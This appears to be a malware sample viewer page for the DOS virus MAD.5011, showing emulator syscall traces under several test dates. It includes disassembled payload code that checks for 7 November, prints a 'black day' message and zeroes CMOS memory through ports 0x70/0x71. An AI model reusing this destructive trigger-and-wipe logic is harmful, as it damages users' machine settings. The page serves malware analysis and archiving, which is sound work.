Sample viewer

vx.netlux.org/Virus.DOS.MAD.5011

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:53:57.833270522Z	42	PC: 12d7b \| Get date 0x12d7b: cmp dh, 0xb 0x12d7e: jne 0x12de9 0x12d80: cmp dl, 7 0x12d83: jne 0x12de9 0x12d85: push cs 0x12d86: pop ds 0x12d87: mov ah, 9 0x12d89: mov dx, 0x478 0x12d8c: add dx, bp 0x12d8e: int 0x21 0x12d90: xor bx, bx 0x12d92: mov al, bl 0x12d94: out 0x70, al 0x12d96: xor al, al 0x12d98: out 0x71, al 0x12d9a: inc bl 0x12d9c: cmp bl, 0x64 0x12d9f: jne 0x12d92 0x12da1: mov ax, 0x30a 0x12da4: mov cx, 1
2018-12-17T22:53:57.836330758Z	37	PC: 12e6a \| Set interrupt vector (Interrupt = '101' AKA 'Get extended country info')
2018-12-17T22:53:57.838222476Z	82	PC: 12e6f \| Get DOS internal pointers (SYSVARS)
2018-12-17T22:53:57.841201869Z	37	PC: 12f26 \| Set interrupt vector (Interrupt = '100' AKA 'Set wait for external event flag')
2018-12-17T22:53:57.843555842Z	37	PC: 12f42 \| Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-17T22:53:57.858333471Z	37	PC: 12f4a \| Set interrupt vector (Interrupt = '8' AKA 'Console input without echo')
2018-12-17T22:53:57.859711372Z	37	PC: 12f66 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11390,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:30:27.279555345Z	42	PC: 12d7b \| Get date 0x12d7b: cmp dh, 0xb 0x12d7e: jne 0x12de9 0x12d80: cmp dl, 7 0x12d83: jne 0x12de9 0x12d85: push cs 0x12d86: pop ds 0x12d87: mov ah, 9 0x12d89: mov dx, 0x478 0x12d8c: add dx, bp 0x12d8e: int 0x21 0x12d90: xor bx, bx 0x12d92: mov al, bl 0x12d94: out 0x70, al 0x12d96: xor al, al 0x12d98: out 0x71, al 0x12d9a: inc bl 0x12d9c: cmp bl, 0x64 0x12d9f: jne 0x12d92 0x12da1: mov ax, 0x30a 0x12da4: mov cx, 1
2018-12-25T12:30:27.282743818Z	37	PC: 12e6a \| Set interrupt vector (Interrupt = '101' AKA 'Get extended country info')
2018-12-25T12:30:27.283933497Z	82	PC: 12e6f \| Get DOS internal pointers (SYSVARS)
2018-12-25T12:30:27.285343261Z	37	PC: 12f26 \| Set interrupt vector (Interrupt = '100' AKA 'Set wait for external event flag')
2018-12-25T12:30:27.29263248Z	37	PC: 12f42 \| Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:30:27.294300111Z	37	PC: 12f4a \| Set interrupt vector (Interrupt = '8' AKA 'Console input without echo')
2018-12-25T12:30:27.295882566Z	37	PC: 12f66 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":1,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11390,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:30:27.312331482Z	42	PC: 12d7b \| Get date 0x12d7b: cmp dh, 0xb 0x12d7e: jne 0x12de9 0x12d80: cmp dl, 7 0x12d83: jne 0x12de9 0x12d85: push cs 0x12d86: pop ds 0x12d87: mov ah, 9 0x12d89: mov dx, 0x478 0x12d8c: add dx, bp 0x12d8e: int 0x21 0x12d90: xor bx, bx 0x12d92: mov al, bl 0x12d94: out 0x70, al 0x12d96: xor al, al 0x12d98: out 0x71, al 0x12d9a: inc bl 0x12d9c: cmp bl, 0x64 0x12d9f: jne 0x12d92 0x12da1: mov ax, 0x30a 0x12da4: mov cx, 1
2018-12-25T12:30:27.315936852Z	37	PC: 12e6a \| Set interrupt vector (Interrupt = '101' AKA 'Get extended country info')
2018-12-25T12:30:27.31780543Z	82	PC: 12e6f \| Get DOS internal pointers (SYSVARS)
2018-12-25T12:30:27.319482694Z	37	PC: 12f26 \| Set interrupt vector (Interrupt = '100' AKA 'Set wait for external event flag')
2018-12-25T12:30:27.321101272Z	37	PC: 12f42 \| Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:30:27.323476768Z	37	PC: 12f4a \| Set interrupt vector (Interrupt = '8' AKA 'Console input without echo')
2018-12-25T12:30:27.324921303Z	37	PC: 12f66 \| Set interrupt vector (Interrupt = '33' AKA 'Random read')

{"DateBased":true,"Day":7,"Month":11,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11390,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:30:27.697220688Z	42	PC: 12d7b \| Get date 0x12d7b: cmp dh, 0xb 0x12d7e: jne 0x12de9 0x12d80: cmp dl, 7 0x12d83: jne 0x12de9 0x12d85: push cs 0x12d86: pop ds 0x12d87: mov ah, 9 0x12d89: mov dx, 0x478 0x12d8c: add dx, bp 0x12d8e: int 0x21 0x12d90: xor bx, bx 0x12d92: mov al, bl 0x12d94: out 0x70, al 0x12d96: xor al, al 0x12d98: out 0x71, al 0x12d9a: inc bl 0x12d9c: cmp bl, 0x64 0x12d9f: jne 0x12d92 0x12da1: mov ax, 0x30a 0x12da4: mov cx, 1
2018-12-25T12:30:27.700356043Z	9	PC: 12d90 \| Display string (String= 'Seventh November - black day of a calendar... ')